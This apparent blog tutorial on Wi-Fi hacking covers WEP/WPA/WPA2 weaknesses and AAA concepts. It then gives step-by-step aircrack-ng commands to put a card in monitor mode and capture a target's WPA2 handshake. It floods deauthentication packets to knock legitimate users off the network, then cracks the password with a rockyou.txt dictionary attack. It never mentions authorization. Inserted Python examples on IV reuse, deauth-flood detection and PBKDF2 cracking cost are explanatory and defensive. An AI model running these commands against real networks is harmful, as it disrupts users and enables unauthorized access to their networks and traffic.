Module: Wi-Fi Hacking

What is WiFi, and How Does it Work?

At a base level, WiFi is a way of getting broadband internet to a device using wireless transmitters and radio signals. Once a transmitter receives data from the internet, it converts the data into a radio signal that can be received and read by WiFi-enabled devices. Information is then exchanged between the transmitter and the device.

When was WiFi invented?

WiFi was invented and first released for consumers in 1997, when a committee called 802.11 was created. This led to the creation of IEEE802.11, which refers to a set of standards that define communication for wireless local area networks (WLANs). Following this, a basic specification for WiFi was established, allowing two megabytes per second of data transfer wirelessly between devices. This sparked a development in prototype equipment (routers) to comply with IEEE802.11, and in 1999, WiFi was introduced for home use.

WiFi Frequencies

WiFi uses electromagnetic waves to communicate data in two main frequency bands: 2.4 GHz (802.11b) and 5 GHz (802.11a). For many years, 2.4 GHz was the popular choice for WiFi users, as it worked with most mainstream devices and was less expensive than 802.11a.


Security Technology

From the perspective of the hacker, wireless security technologies are among the most pertinent features. Multiple security technologies have been deployed in Wi-Fi to make an inherently insecure technology secure. Our attack approach will depend upon which of these security technologies is being deployed.

So, let’s take a quick look at them here.


WEP, or Wired Equivalent Privacy, was the first wireless security scheme employed. As its name implies, it was designed to provide the end-user with security essentially equivalent to the privacy enjoyed in a wired environment. Unfortunately, it failed miserably.

WEP is extraordinarily easy to crack because of its flawed use of the RC4 encryption algorithm; it's not unusual to crack WEP in less than 5 minutes. WEP used a very small (24-bit) initialization vector (IV) that could be captured in the data stream, and the captured IVs could then be used to recover the password (the WEP key) with statistical techniques.

Despite this, I still find it being used in household and small business implementations, but seldom in an enterprise environment.
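To make the IV argument above concrete, here is an added example (not from the original article) that works out, from the birthday bound, roughly how many frames a WEP network sends before some 24-bit IV repeats, how long a sequential IV counter takes to wrap at an assumed frame rate, and what a repeat leaks: two frames encrypted with the same RC4 keystream XOR to the XOR of their plaintexts, so the eavesdropper learns about both payloads without the key. The keystream is random bytes standing in for RC4 output, the payloads are constructed, and the 1,000 frames/s rate is an assumption.

```python
import math
import os

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 distinct IVs


def frames_until_iv_repeat(probability=0.5, space=IV_SPACE):
    """Birthday bound: number of frames with randomly chosen IVs after which
    at least one IV has repeated with the given probability."""
    return math.sqrt(2 * space * math.log(1.0 / (1.0 - probability)))


def seconds_to_exhaust_iv_space(frames_per_second, space=IV_SPACE):
    """Time for a sequential IV counter to wrap around at a given frame rate,
    after which every keystream is being reused."""
    return space / frames_per_second


def xor_bytes(a, b):
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(plaintext1, plaintext2, keystream):
    """Encrypt two frame payloads under the same keystream (what an IV repeat
    causes in WEP) and return what an eavesdropper computes from the two
    ciphertexts alone: c1 XOR c2, which equals p1 XOR p2."""
    assert len(plaintext1) == len(plaintext2) <= len(keystream)
    c1 = xor_bytes(plaintext1, keystream)
    c2 = xor_bytes(plaintext2, keystream)
    return xor_bytes(c1, c2)


if __name__ == "__main__":
    print(f"IVs available: {IV_SPACE}")
    print(f"Frames until a repeat is even odds: {frames_until_iv_repeat():.0f}")
    # Assumed frame rate for a busy access point (constructed figure).
    hours = seconds_to_exhaust_iv_space(1000) / 3600
    print(f"Counter wraps after {hours:.1f} hours at 1000 frames/s")
    # Constructed payloads and a random stand-in for the RC4 keystream.
    p1 = b"GET /index.html"
    p2 = b"GET /login.php "
    ks = os.urandom(len(p1))
    leak = keystream_reuse_leak(p1, p2, ks)
    print(f"c1 XOR c2 == p1 XOR p2: {leak == xor_bytes(p1, p2)}")
```

The repeat figure comes out in the low thousands of frames, a few seconds of traffic on a busy network, which is why WEP's designers' choice of a 24-bit IV matters far more than the RC4 key length does.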


WPA was the response by the industry to the revealed weaknesses of WEP. It’s often referred to as WPA1 to distinguish it from WPA2.

WPA used the Temporal Key Integrity Protocol (TKIP) to improve on the security of WEP without requiring new hardware. It still relies on the same RC4 cipher as WEP for encryption, but it makes the statistical attacks used to crack WEP much more difficult and time-consuming.


WPA2-PSK is the implementation of WPA2 for the home or small business user. As the name implies, it’s the WPA2 implementation that uses a pre-shared key (PSK). It’s this security standard that is used by most households today, and although it’s far more secure, it’s still vulnerable to various attacks.

A feature added in 2007 called Wi-Fi Protected Setup, or WPS, allows us to bypass the security of WPA2-PSK. We'll look at a few attacks on WPA2-PSK in coming weeks.


WPA2-AES is the enterprise implementation of WPA2. It uses the Advanced Encryption Standard (AES) to encrypt data and is the most secure of these schemes. It's often coupled with a RADIUS server dedicated to authentication.

Although cracking it is possible, it is significantly more difficult.


AAA – Concept

Authentication refers to unique identifying information from each system user, generally in the form of a username and password. System administrators monitor and add or delete authorized users from the system.

Authorization refers to the process of adding or denying individual user access to a computer network and its resources. Users may be given different authorization levels that limit their access to the network and associated resources. Authorization determination may be based on geographical location restrictions, date or time-of-day restrictions, frequency of logins or multiple logins by single individuals or entities. Other associated types of authorization service include route assignments, IP address filtering, bandwidth traffic management and encryption.

Accounting refers to the record-keeping and tracking of user activities on a computer network. For a given time period this may include, but is not limited to, real-time accounting of time spent accessing the network, the network services employed or accessed, capacity and trend analysis, network cost allocations, billing data, login data for user authentication and authorization, and the data or data amount accessed or transferred.

Examples of AAA protocols include: 

  • Diameter, a successor to Remote Authentication Dial-In User Service (RADIUS)
  • Terminal Access Controller Access-Control System (TACACS)
  • Terminal Access Controller Access-Control System Plus (TACACS+), a proprietary Cisco Systems protocol that provides access control for network servers, routers and other network computing devices.

Types of AAA servers include: 

  • Access Network AAA (AN-AAA) which communicates with radio network controllers
  • Broker AAA (B-AAA), which manages traffic between roaming partner networks
  • Home AAA (H-AAA)

Steps to perform Wi-Fi hacking:

  1. Check the wireless network adapter
     # ifconfig
  2. Activate monitor mode on your wireless card
     # airmon-ng start wlan1
  3. Activate capturing mode on the monitor interface
     # airodump-ng wlan1mon
  4. Start capturing the target's traffic and write the capture, including the handshake, to a file
     # airodump-ng -c 1 --write /root/Desktop/lucifer2.0 --bssid <target BSSID> wlan1mon
     • -c is the channel number. There are 14 channels, and every Wi-Fi network operates on one particular channel, so the target's exact channel number must be given.
     • --bssid is the MAC address of the target Wi-Fi access point.
     • --write sets the name of the file the target's capture is written to.
  • In this step we send deauthentication (deauth) packets to the connected clients so that we can capture the handshake exchanged between the two parties when a client reconnects.
     • A deauth packet jams the Wi-Fi connection or, put another way, kicks the legitimate users off the network.

# aireplay-ng --deauth 1000 -a <target BSSID> wlan1mon
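The deauthentication step is also the loudest part of this procedure from the network's side, so here is an added example (not part of the original article) of the detection logic a wireless IDS applies to it: count deauthentication frames per sending BSSID in a sliding one-second window and alert when the count reaches a threshold, and separately note deauths addressed to the broadcast address, which access points seldom send in normal operation. The frame records and MAC addresses are constructed, and the one-second window and threshold of 10 are assumed tuning values.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "aa:bb:cc:dd:ee:01"        # constructed access point BSSID
CLIENT = "11:22:33:44:55:66"    # constructed client MAC

# Constructed records standing in for parsed 802.11 management frames (not a
# real capture). Fields: (timestamp_seconds, subtype, source_addr, dest_addr, reason_code)
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, BROADCAST, None),
    (0.50, "deauth", AP, CLIENT, 3),        # a single deauth: ordinary housekeeping
    (1.20, "beacon", AP, BROADCAST, None),
    (2.00, "probe_req", CLIENT, BROADCAST, None),
]
# A burst of 15 broadcast deauths within 0.3 s, the pattern a flooding tool produces.
SAMPLE_FRAMES += [(10.0 + i * 0.02, "deauth", AP, BROADCAST, 7) for i in range(15)]


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Return {source: peak_count} for every source whose deauth frames within
    any sliding window of `window` seconds reached `threshold`."""
    recent = defaultdict(deque)   # source -> deauth timestamps still inside the window
    peak = defaultdict(int)
    for ts, subtype, src, _dst, _reason in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:   # expire timestamps that fell out of the window
            q.popleft()
        peak[src] = max(peak[src], len(q))
    return {src: n for src, n in peak.items() if n >= threshold}


def broadcast_deauths(frames):
    """Count deauth frames addressed to the broadcast address, per source."""
    counts = defaultdict(int)
    for _ts, subtype, src, dst, _reason in frames:
        if subtype == "deauth" and dst == BROADCAST:
            counts[src] += 1
    return dict(counts)


def alerts(frames, window=1.0, threshold=10):
    """Human-readable alert lines for a batch of frames."""
    lines = []
    for src, n in detect_deauth_flood(frames, window, threshold).items():
        lines.append(f"ALERT deauth flood: {n} deauth frames from {src} within {window:g}s")
    for src, n in broadcast_deauths(frames).items():
        lines.append(f"NOTE broadcast deauth: {n} frame(s) from {src} to {BROADCAST}")
    return lines


if __name__ == "__main__":
    for line in alerts(SAMPLE_FRAMES):
        print(line)
```

The single deauth at 0.5 s never trips the threshold, while the burst does; in practice the same logic is run per channel from a monitor-mode interface, and the source address is worth comparing against the known BSSID list, since a flooding tool spoofs the access point's address.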

  • In this step we use aircrack-ng to run a dictionary (brute-force) attack against the captured handshake.

# aircrack-ng -a2 -b <target BSSID> -w /root/Desktop/rockyou.txt /root/Desktop/Lucifer.Cap

aircrack-ng needs a dictionary (wordlist): it derives the key from each candidate word and tests it against the captured handshake, and when a candidate matches, the password has been identified.
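The dictionary attack works because the standard fixes how the key is derived from the passphrase, so the only variable the network owner controls is the passphrase itself; this also explains why the WPA2-PSK section above calls it "still vulnerable". Here is an added example (not from the original article or from aircrack-ng) that performs the WPA2-PSK key derivation defined in IEEE 802.11i, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations, and uses it to compare the worst-case time to try an entire wordlist against the time for a random passphrase. The guess rate of 100,000 derivations per second and the rockyou.txt line count of about 14.3 million are assumptions used for the estimate; the handshake MIC check that aircrack-ng performs after deriving each key is not reproduced.

```python
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the WPA2-PSK standard; the network owner cannot raise it
PMK_LENGTH = 32            # bytes


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).
    This is the work a dictionary attack must repeat for every candidate word;
    the SSID acting as salt is why precomputed tables are only valid per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def measure_guess_rate(ssid: str, samples: int = 20) -> float:
    """Single-threaded derivations per second on this machine, for a local feel
    of the per-candidate cost (real cracking rigs are orders of magnitude faster)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(ssid, f"candidate{i}")
    return samples / (time.perf_counter() - start)


def worst_case_seconds(candidates: int, guesses_per_second: float) -> float:
    """Time to exhaust a candidate space at a given derivation rate."""
    return candidates / guesses_per_second


def random_passphrase_space(alphabet_size: int, length: int) -> int:
    """Candidates an attacker must consider for a uniformly random passphrase."""
    return alphabet_size ** length


def human_duration(seconds: float) -> str:
    """Render a duration in the largest convenient unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


if __name__ == "__main__":
    rate = 100_000                 # assumed guess rate of a cracking rig
    rockyou_lines = 14_344_391     # approximate line count of rockyou.txt (assumption)
    print(f"local single-thread rate: {measure_guess_rate('IEEE'):.0f} PMK/s")
    print("whole rockyou.txt at 100k/s:",
          human_duration(worst_case_seconds(rockyou_lines, rate)))
    print("random 12-char [A-Za-z0-9] at 100k/s:",
          human_duration(worst_case_seconds(random_passphrase_space(62, 12), rate)))
```

The contrast is the defensive lesson of this whole procedure: a wordlist passphrase falls in minutes at the assumed rate, while a random 12-character one takes longer than the age of the universe at the same rate, and nothing in the WPA2-PSK protocol lets the owner make a weak passphrase more expensive to guess.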

Wordlist with crunch


Partho Kr. Mandal

By admin
